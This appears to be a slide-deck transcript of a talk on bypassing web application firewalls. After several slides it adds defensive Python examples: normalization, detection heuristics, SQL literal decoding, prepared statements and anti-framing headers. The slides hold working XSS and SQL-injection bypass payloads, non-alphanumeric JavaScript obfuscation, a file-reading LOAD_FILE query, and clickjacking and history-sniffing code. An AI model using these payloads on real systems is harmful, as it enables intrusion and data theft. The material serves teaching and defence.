XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkeary
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
 

Bypassing Web Application Firewalls

  • 1. Bypassing Web Application Firewalls (WAFs)
    Ing. Pavol Lupták, CISSP, CEH, Lead Security Consultant
    www.nethemba.com
  • 2. Nethemba – All About Security
    - Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)
    - Core business: all kinds of penetration tests, comprehensive web application security audits, local system and wifi security audits, security consulting, forensic analysis, secure VoIP, ultra-secure systems
    - OWASP activists: leaders of the Slovak/Czech OWASP chapters, co-authors of the most recognized OWASP Testing Guide v3.0, working on the new version
    - We are the only ones in Slovakia/Czech Republic that offer:
      - Penetration tests and security audits of SAP
      - Security audits of smart RFID cards
      - Unique own and sponsored security research in many areas (see our references – vulnerabilities in public transport SMS tickets, cracked the most used Mifare Classic RFID cards)
  • 3. What are WAFs?
    - Emerged from IDS/IPS focused on the HTTP protocol and HTTP-related attacks
    - Usually contain a lot of complex regexp rules to match
    - Support special features like cookie encryption, CSRF protection, etc.
    - Except for the free mod_security they are quite expensive (and often there is no correlation between the price and their filtering capabilities)
  • 4. WAF implementations
    - Usually they are deployed in "blacklisting mode", which is more vulnerable to bypasses and targeted attacks
    - The application "context" (the type of allowed inputs) must be known before the more secure "whitelisting mode" can be deployed
    - All WAFs can be bypassed
    - A WAF is just a workaround, but from the security point of view it can be cost-effective
  • 5. WAF filter rules
    - Directly reflect WAF effectiveness
    - For most WAF vendors they are closely guarded secrets – most determined attackers are able to bypass them without seeing the actual rules
    - Open-source WAFs (mod_security, PHPIDS) have open-source rules, which allows more scrutiny by skilled penetration testers
  • 6. Typical WAF bypasses
    Blocked attack                          | Undetected modification
    ' or 1=1--                              | ' or 2=2--
    alert(0)                                | %00alert(0)
    <script>alert(0)</script>               | <script type=vbscript>MsgBox(0)</script>
    ' or ''''='r                            | '/**/OR/**/''''='
    <script>alert(0)</script>               | <img src="x:x" onerror="alert(0)"></img>
    <img src=x:x onerror=alert(0)//></img>  | <img src=http://url onload=alert(0)//></img>
    1 or 1=1                                | (1)or(1)=(1)
    eval(name)                              | x=this.name, X(0?$:name+1)
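The table above reads as a list of failures of literal pattern matching: a different number, a NUL byte, an attribute, an inline comment or a pair of parentheses is enough. The following is an added example (not from the talk) of the normalization step a WAF rule author uses to close most of these gaps. The "naive" rule set, the normalization pipeline and the thresholds are assumptions chosen to illustrate the point, not the rules of any real product; the sample inputs are six pairs copied from slide 6. The last pair stays undetected after normalization too, which is the reason the summary slide asks for whitelisting instead.

```python
"""Normalize-then-match: why WAF blacklist rules miss the slide-6 variants.

Added example, not from the talk.  Rule sets and normalization steps are
assumptions for illustration only.
"""
import re
from urllib.parse import unquote

# Assumed "naive" rules: case-sensitive regexes applied to the raw parameter.
NAIVE_RULES = [re.compile(p) for p in (r"\bor 1=1", r"<script>", r"\balert\(", r"\beval\(", r"' or '")]

# Assumed rules written against the normalized form: patterns, not literals.
NORMALIZED_RULES = [
    re.compile(r"\bor\b\s*\(?\s*(\d+)\s*\)?\s*=\s*\(?\s*\1\b"),  # or 1=1, or 2=2, or(1)=(1)
    re.compile(r"'\s*or\s*'"),                                     # ' or '  after comment stripping
    re.compile(r"<script\b"),                                      # any <script ...> tag
    re.compile(r"\bon\w+\s*="),                                    # inline event handlers
    re.compile(r"\b(alert|eval)\s*\("),
]

# (blocked attack, undetected modification) pairs copied from slide 6.
SLIDE_6_PAIRS = [
    ("' or 1=1--", "' or 2=2--"),
    ("alert(0)", "%00alert(0)"),
    ("<script>alert(0)</script>", "<script type=vbscript>MsgBox(0)</script>"),
    ("' or ''''='", "'/**/OR/**/''''='"),
    ("1 or 1=1", "(1)or(1)=(1)"),
    ("eval(name)", "x=this.name"),
]


def normalize(payload: str) -> str:
    """Canonicalize a parameter value so one rule covers many spellings."""
    s = unquote(payload)                 # %00alert(0) -> "\x00alert(0)"
    s = s.replace("\x00", "")            # NUL is never part of valid input
    s = re.sub(r"/\*.*?\*/", " ", s)     # inline SQL comments behave as whitespace
    s = s.lower()                        # OR == or
    return re.sub(r"\s+", " ", s)        # collapse whitespace runs


def matches_naive(payload: str) -> bool:
    return any(r.search(payload) for r in NAIVE_RULES)


def matches_normalized(payload: str) -> bool:
    s = normalize(payload)
    return any(r.search(s) for r in NORMALIZED_RULES)


def run_table() -> list:
    """Per slide-6 row: (attack, variant, naive catches variant, normalized catches variant)."""
    return [(a, v, matches_naive(v), matches_normalized(v)) for a, v in SLIDE_6_PAIRS]


if __name__ == "__main__":
    for attack, variant, naive, normd in run_table():
        print(f"{variant:45} naive={naive!s:5} normalized={normd}")
```

The naive rules catch every left-hand entry and none of the right-hand ones; after normalization five of the six variants are caught by the same handful of rules. `x=this.name` contains no keyword at all, and no blacklist can enumerate every harmless-looking expression that becomes dangerous in a script context.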
  • 7. Yes, a WAF may also be vulnerable!
    - A WAF also increases the attack surface of the target organization
    - A WAF may be the target of, and vulnerable to, malicious attacks, e.g. XSS, SQL injection, denial-of-service attacks, remote code execution vulnerabilities
    - These vulnerabilities have been found in all types of WAF products(!)
  • 8. Typical bypass flow
    1. Find out which characters / sequences are allowed by the WAF
    2. Make an obfuscated version of your injected payload
    3. Test it and watch the WAF/application response
    4. If it does not work, modify it and go back to step 2
  • 9. Javascript obfuscation
    - Javascript has very powerful features
    - A Javascript payload is used in XSS attacks
    - It is full of evals, expression closures, generator expressions, iterators, special characters and shortcuts
    - Supports a lot of encodings (unicode – multibyte characters, hexadecimal, octal, a combination of all of them)
    - Supports XOR, "encryption", Base64
  • 10. Non-alphanumeric javascript code
    - Even if only a few characters are allowed it is possible to construct fully functional code:
    _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;
    $$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"") [$]+(($==$)+"")[_]+(($==$)++"")[__]+({}+"")[_____]+(($==$)+"")[$]+({} +"")[_]+(($==$)+"")[_];
    $$$=(($!=$)+"")+[_]+(($!=$)+"")[__]+(($==$)+"") [___]+(($==$)+"")[_]+(($==$)+"")[$];
    $_$=({}+"")[+_____]+({}+"")[_]+({} +"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({} [$]+"")[__]+(($==$)+"")[___];
    ($)[$$][$$]($$$+"('"+$_$+"')")()
    ([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](-~Á)
  • 11. Let's bypass WAF!
    - Example situation: the WAF blocks alpha characters and numbers (probably not a very realistic situation, just a proof-of-concept :-)
    - Allows only a few special characters: (){}_=[];$"!+<>
    - Let's generate fully non-alphanumeric javascript code!
  • 13. Source of different alphanumeric characters in Javascript
    Javascript object / string  | Result / error state
    {}+''                       | "[object Object]"
    +[][+[]]                    | "NaN"
    [][+[]]+[]                  | "undefined"
    [![]]+[]                    | "false"
    [!![]]+[]                   | "true"
  • 14. Shortest possible ways to create zero without using numbers
    Characters | Result
    +[]        | 0
    +''        | 0
    +""        | 0
    -[]        | 0
    -''        | 0
    -""        | 0
  • 15. Generating numbers
    +[]                              //0
    ++[[]][+[]]                      //1
    +!+[]                            //1
    ++[++[[]][+[]]][+[]]             //2
    !+[]+!+[]                        //2
    ++[++[++[[]][+[]]][+[]]][+[]]    //3
    !+[]+!+[]+!+[]                   //3
  • 16. Gain alpha characters without directly using them
    - When you define a Javascript object using the object literal and concatenate it with a string, the result is [object Object]
    _={}+''; //[object Object]
    alert(_[1]) //returns the 'o' character
  • 17. Generate the string "alert" without using any alphanumeric characters
    - Let's start with 'a'
    - What Javascript object contains 'a'?
    - We can use 'NaN' (Not a Number)
    - Access an empty string with index "0" (undefined) and convert it to a number (NaN)
    +[][+[]] // result: NaN
  • 18. Generating the 'a' character
    NaN[1]='a'
    ++[[]][+[]] //1
    +[][+[]]+[] // result string: NaN
    (+[][+[]]+[])[++[[]][+[]]] //a
    - We have the character 'a'
  • 19. Generating the 'l' character
    - Use boolean false
    - We can use the ! (NOT) operator, e.g. ''==0 //true
    - Use a blank array (string) and then the NOT operator to obtain a boolean, wrap it with [] and convert it to a string
    ([![]]+[]) //string "false"
  • 20. Generating the 'l' character
    ++[++[[]][+[]]][+[]] //2
    ([![]]+[]) //string "false"
    'false'[2] = ([![]]+[])[++[++[[]][+[]]][+[]]] // 'l'
    - We have the 'l' character!
  • 21. Generating the 'e' character
    - It's easy, we can use boolean true
    ([!![]]+[]) // string 'true'
    ++[++[++[[]][+[]]][+[]]][+[]] //3
    'true'[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] //e
    - And we have the 'e' character!
  • 22. Generating the 'r' character
    - It's easy, we can use boolean true
    ([!![]]+[]) // string 'true'
    ++[[]][+[]] //1
    'true'[1] = ([!![]]+[])[++[[]][+[]]] //r
    - And we have the 'r' character!
  • 23. Generating the 't' character
    - It's easy, we can use boolean true
    ([!![]]+[]) // string 'true'
    +[] //0
    'true'[0] = ([!![]]+[])[+[]] //t
    - And we have the 't' character!
  • 24. And now we have the 'alert' string!
    (+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] //string 'alert'
  • 25. How to execute the code of our choice?
    - It is necessary to return the window object to access all properties of window
    - If you can access a constructor, you can access the Function constructor to execute arbitrary code
    - The shortest possible way to get window is:
    alert((1,[].sort)()) // shows the window object!
    - Works in all browsers except IE
  • 26. How to generate the 'sort' string
    - We know how to generate the string 'alert'
    - We need to generate the 'sort' string
    'false'[3]=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] //'s'
    - We can gain 'o' from []+{} ([object Object])
    ([]+{})[++[[]][+[]]] //o
    - We have already generated 'r' and 't'
  • 28. Let's build it together – call alert(1)
    (1,[].sort)().alert(1)
    - After changing the number 1 and all alpha characters to their obfuscated version we get:
    ([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]]) //calls alert(1)!
  • 29. How to call any arbitrary Javascript function
    - Using the array constructor (accessing the constructor twice from an array object returns Function):
    [].constructor.constructor("alert(1)")()
    - We need to generate the remaining letters 'c','n','u'; gain them from the output of the [].sort function:
    function sort() { [native code] }
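Slides 10 to 28 build an executable payload out of nothing but brackets, pluses and exclamation marks. Keyword rules are blind to it, but its shape is distinctive, and that shape is what a detection rule can key on. The following is an added example (not from the talk) of such a heuristic, written from the rule author's side: it scores a parameter value on its share of non-alphanumeric characters, its bracket nesting depth and the number of type-coercion idioms (`+[]`, `![]`, `[][`) the slides use to mint characters. The thresholds and the benign comparison values are assumptions; the positive sample is the slide-24 'alert' expression.

```python
"""Heuristic for the non-alphanumeric JavaScript of slides 10-28.

Added example, not from the talk.  Thresholds and benign samples are assumed.
"""
import re

# Slide 24: the string 'alert' built without alphanumerics (copied from the slide).
SLIDE_24_ALERT = (
    "(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]"
    "+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]"
    "+([!![]]+[])[+[]]"
)

# Constructed benign values that also contain brackets, pluses or parentheses.
BENIGN = ["John Smith", "order-2024-0017", "a[0]=1&b[1]=2", "(555) 123-4567", "1+1=2 sale!"]

# The coercion idioms the slides rely on to turn [] into numbers and strings.
COERCION_IDIOMS = re.compile(r"\+\[\]|!\[\]|\]\[\+|\[\]\[")


def js_primitive_score(value: str) -> dict:
    """Features a rule author would key on for this payload family."""
    non_alnum = sum(1 for c in value if not c.isalnum() and not c.isspace())
    ratio = non_alnum / max(len(value), 1)
    depth = deepest = 0
    for c in value:                      # track bracket/paren nesting depth
        if c in "[(":
            depth += 1
            deepest = max(deepest, depth)
        elif c in "])":
            depth -= 1
    return {
        "non_alnum_ratio": ratio,
        "max_nesting": deepest,
        "coercion_idioms": len(COERCION_IDIOMS.findall(value)),
    }


def looks_like_nonalnum_js(value: str, min_len: int = 12) -> bool:
    """Assumed thresholds: mostly symbols, nested at least three levels deep and
    at least three coercion idioms.  Short values never trigger, so a phone
    number or an array-style form key stays below the bar."""
    if len(value) < min_len:
        return False
    f = js_primitive_score(value)
    return f["non_alnum_ratio"] >= 0.9 and f["max_nesting"] >= 3 and f["coercion_idioms"] >= 3


if __name__ == "__main__":
    print("slide 24:", js_primitive_score(SLIDE_24_ALERT), looks_like_nonalnum_js(SLIDE_24_ALERT))
    for v in BENIGN:
        print(f"{v!r:25} -> {looks_like_nonalnum_js(v)}")
```

This belongs in the alerting layer behind the whitelisting the summary slide asks for, not in front of it: the second slide-10 payload, built from accented identifiers that `str.isalnum()` treats as letters, already shows the limits of a shape-based blacklist.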
  • 30. SQL obfuscation
    - What is obfuscation of an SQL injection vector?
    - Different DBMSs have different SQL syntax; most of them support Unicode, Base64, hex, octal and binary representations, escaping, hashing algorithms (MD5, SHA-1)
    - Many "blacklisted" characters can be replaced by their functional alternatives (0xA0 in MySQL)
    - Obfuscated comments – it is difficult to determine what is a comment and what is not
  • 31. SQL obfuscation examples
    SELECT CONCAT(char(x'70617373',b'1110111011011110111001001100100'))
    s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
    SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
    SELECT(extractvalue(0x3C613E61646D696E3C2F613, 0x2F61))
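Logged queries that look like the slide-31 examples are unreadable in an alert until the encoded literals are decoded. The following is an added example (not from the talk) of a small decoder an analyst or a WAF transformation stage would use: it strips `/* */` comments and rewrites `0x..`, `x'..'` and `b'..'` literals into quoted text. Inputs are the two complete slide-31 statements and the comment-obfuscated one; the regexes are mine, not any product's.

```python
"""Decode the encoded literals in the slide-31 SQL examples for triage.

Added example, not from the talk.  Input statements are copied from slide 31.
"""
import re

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)|[xX]'([0-9A-Fa-f]+)'")
BIN_LITERAL = re.compile(r"[bB]'([01]+)'")
COMMENT = re.compile(r"/\*.*?\*/", re.S)   # closes at the first */ after an opener

SLIDE_31_CONCAT = "SELECT CONCAT(char(x'70617373',b'1110111011011110111001001100100'))"
SLIDE_31_LOAD_FILE = "SELECT LOAD_FILE(0x633A5C626F6F742E696E69)"
SLIDE_31_COMMENTS = "s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1"


def decode_literals(sql: str) -> list:
    """Return (literal as written, decoded bytes) for every hex/binary literal."""
    found = []
    for m in HEX_LITERAL.finditer(sql):
        digits = m.group(1) or m.group(2)
        if len(digits) % 2:                 # odd digit count: left-pad to whole bytes
            digits = "0" + digits
        found.append((m.group(0), bytes.fromhex(digits)))
    for m in BIN_LITERAL.finditer(sql):
        n = int(m.group(1), 2)              # MySQL's CHAR() emits the bytes of this integer
        found.append((m.group(0), n.to_bytes((n.bit_length() + 7) // 8, "big")))
    return found


def reveal(sql: str) -> str:
    """Comment-stripped statement with every encoded literal shown as quoted text."""
    out = COMMENT.sub(" ", sql)
    for literal, raw in decode_literals(sql):
        out = out.replace(literal, "'" + raw.decode("ascii", errors="replace") + "'")
    return re.sub(r"\s+", " ", out).strip()


if __name__ == "__main__":
    for stmt in (SLIDE_31_CONCAT, SLIDE_31_LOAD_FILE, SLIDE_31_COMMENTS):
        print(stmt, "->", reveal(stmt))
```

The first statement decodes to `CONCAT(char('pass','word'))` and the second to `LOAD_FILE('c:\boot.ini')`. The comment example is the slide-30 point made concrete: a scanner that closes every comment at the first `*/`, as this regex does, is left with `s 1`, while a scanner that accepts `/*/` as a complete comment reads `select~~1`. Whichever convention the WAF picks, it only helps if it is the same one the database uses.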
  • 32. New SQL features
    - MySQL/PostgreSQL support XML functions:
    SELECT UpdateXML('<script x=_></script>', '/script/@x','src=//0x.lv');
    - HTML5 supports local DB storage (SQLite 3.1+) (openDatabase object) – can be misused for persistent XSS, local SQL injection attacks
  • 33. Existing obfuscation tools
    - Hackvertor http://hackvertor.co.uk/public
    - HackBar https://addons.mozilla.org/en-US/firefox/addon/hack
    - Malzilla http://malzilla.sourceforge.net/
    - Your imagination :)
  • 34. Summary
    - WAFs are just workarounds!
    - The best solution is to care about security in every SDLC phase and strictly validate all inputs and outputs in the application
    - Use whitelisting instead of blacklisting (both in the application and in the WAF!)
    - Use multilayer security - 3rd layer database architecture or database firewalls
      - for SQL use "prepared" statements
      - for HTML use HTML Purifier or the OWASP AntiSamy project
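The summary names the two application-side controls that make the slide-6 variants irrelevant: whitelist validation of the input and prepared statements for the database call. The following is an added example (not from the talk) showing both next to the string-concatenated query they replace, with `' or 2=2--` from slide 6 as the input. The username format, the in-memory SQLite table and its two rows are constructed for the example.

```python
"""Whitelist validation and a prepared statement versus string concatenation.

Added example, not from the talk.  Table contents and username policy are assumed.
"""
import re
import sqlite3

# Assumed application context: a login handle is a short lowercase identifier.
USERNAME = re.compile(r"[a-z][a-z0-9_]{2,31}")


def valid_username(value: str) -> bool:
    """Whitelist: accept only what the field is defined to hold, reject all else."""
    return USERNAME.fullmatch(value) is not None


def _db() -> sqlite3.Connection:
    """Constructed sample table (not real data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "admin"), ("bob", "user")])
    return con


def lookup_concat(name: str) -> list:
    """Vulnerable form: the input becomes part of the SQL text, so a quote
    ends the literal and the rest of the input is parsed as SQL."""
    con = _db()
    return con.execute("SELECT name FROM users WHERE name = '" + name + "'").fetchall()


def lookup_prepared(name: str) -> list:
    """Prepared statement: the input is bound as data and can never change
    the query's structure, whatever characters it contains."""
    con = _db()
    return con.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()


def login_lookup(name: str) -> list:
    """Both layers together: validate first, then query with a bound parameter."""
    if not valid_username(name):
        return []
    return lookup_prepared(name)


if __name__ == "__main__":
    tautology = "' or 2=2--"
    print("concat   :", lookup_concat(tautology))     # every row comes back
    print("prepared :", lookup_prepared(tautology))   # no row matches that literal name
    print("whitelist:", valid_username(tautology), login_lookup("alice"))
```

Note that the concatenated version returns every user for the slide-6 input although no WAF was involved; the prepared version returns nothing because the whole string is compared as one name, and the whitelist rejects it before a query is built at all.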
  • 35. References
    - Web Application Obfuscation, http://www.amazon.com/Web-Application-Obfuscati
    - XSS Attacks: Cross Site Scripting Exploits and Defense, http://www.amazon.com/XSS-Attacks-Scripting-Exp
    - Special thanks to Mario Heiderich and Stefano Di Paola
  • 36. UI redressing attacks - clickjacking
    <style>
    iframe { filter: alpha(opacity=0); opacity: 0; position: absolute; top: 0px; left: 0px; height: 300px; width: 250px; }
    img { position: absolute; top: 0px; left: 0px; height: 300px; width: 250px; }
    </style>
    <img src="WHAT THE USER SEES"/>
    <iframe src="WHAT THE USER IS ACTUALLY INTERACTING WITH"></iframe>
  • 37. Clickjacking protection
    - Blocks using X-FRAME/OPTIONS: NEVER
    <body>
    <script>
    if (top!=self) document.write('<plaintext>');
    </script>
    ...
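The in-page frame buster above only helps once the script runs; the header is what stops the browser from rendering the page in a frame at all. The following is an added example (not from the talk) of where that header is set on the server side: a WSGI middleware that adds it to every response. The standard header name is `X-Frame-Options` with the value `DENY` (or `SAMEORIGIN`); the `Content-Security-Policy: frame-ancestors` directive is its standardized successor and is sent alongside it for browsers that honour CSP. The inner application is a constructed stand-in.

```python
"""Anti-framing headers as WSGI middleware, to pair with the slide-37 frame buster.

Added example, not from the talk.  The demo application is constructed.
"""

ANTI_FRAMING = [
    ("X-Frame-Options", "DENY"),
    ("Content-Security-Policy", "frame-ancestors 'none'"),
]


def anti_framing(app):
    """Wrap a WSGI app so every response carries the anti-framing headers.
    A header the app already set (for example a page that must allow
    same-origin framing, or a fuller CSP) is left as the app wrote it."""
    def wrapped(environ, start_response):
        def sr(status, headers, exc_info=None):
            present = {name.lower() for name, _ in headers}
            extra = [(n, v) for n, v in ANTI_FRAMING if n.lower() not in present]
            return start_response(status, headers + extra, exc_info)
        return app(environ, sr)
    return wrapped


def demo_app(environ, start_response):
    """Constructed stand-in for the protected application."""
    start_response("200 OK", [("Content-Type", "text/html")])
    return [b"<body>...</body>"]


def demo_app_same_origin(environ, start_response):
    """Constructed app that needs to be framed by its own origin."""
    start_response("200 OK", [("Content-Type", "text/html"), ("X-Frame-Options", "SAMEORIGIN")])
    return [b"<body>widget</body>"]


def response_headers(app, path="/"):
    """Run one GET through a WSGI app and return (status, headers, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"], captured["headers"] = status, headers

    body = b"".join(app({"PATH_INFO": path, "REQUEST_METHOD": "GET"}, start_response))
    return captured["status"], captured["headers"], body


if __name__ == "__main__":
    status, headers, body = response_headers(anti_framing(demo_app))
    print(status, headers)
```

The same check works against a live deployment: if the header is missing from a response that carries authenticated state, the page can be framed, whatever the frame buster does.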
  • 38. CSS History attack
    <style>
    a { position: relative; }
    a:visited { position: absolute; }
    </style>
    <a id="v" href="http://www.google.com/">Google</a>
    <script>
    var l=document.getElementById("v");
    var c=getComputedStyle(l).position;
    c=="absolute"?alert("visited"):alert("not visited");
    </script>
  • 39. CSS History exploitation methods
    - Social network deanonymization attacks
    - Session ID/CSRF token local brute force attack
    - LAN scanners
    - Fixed in Firefox 4.0, current browsers are vulnerable